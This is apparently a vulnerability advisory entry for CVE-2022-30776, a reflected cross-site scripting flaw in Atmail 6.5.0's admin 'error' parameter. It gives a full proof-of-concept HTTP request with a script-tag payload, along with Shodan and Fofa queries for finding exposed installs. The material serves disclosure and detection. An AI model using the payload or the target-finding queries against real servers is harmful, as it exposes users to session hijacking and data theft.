| Title | Atmail 6.5.0 - Cross-Site Scripting |
|---|---|
| Author | 3th1c_yuk1 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.45526 |
| CVE ID | CVE-2022-30776 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"atmail"http.html:"powered by atmail" |
| Fofa Query | body="powered by atmail"body="atmail" |
| Tags | cve2022 cve atmail xss vuln |
Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ ‘error’ parameter.
GET /atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-30776.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-30776.pcap
N/AN/A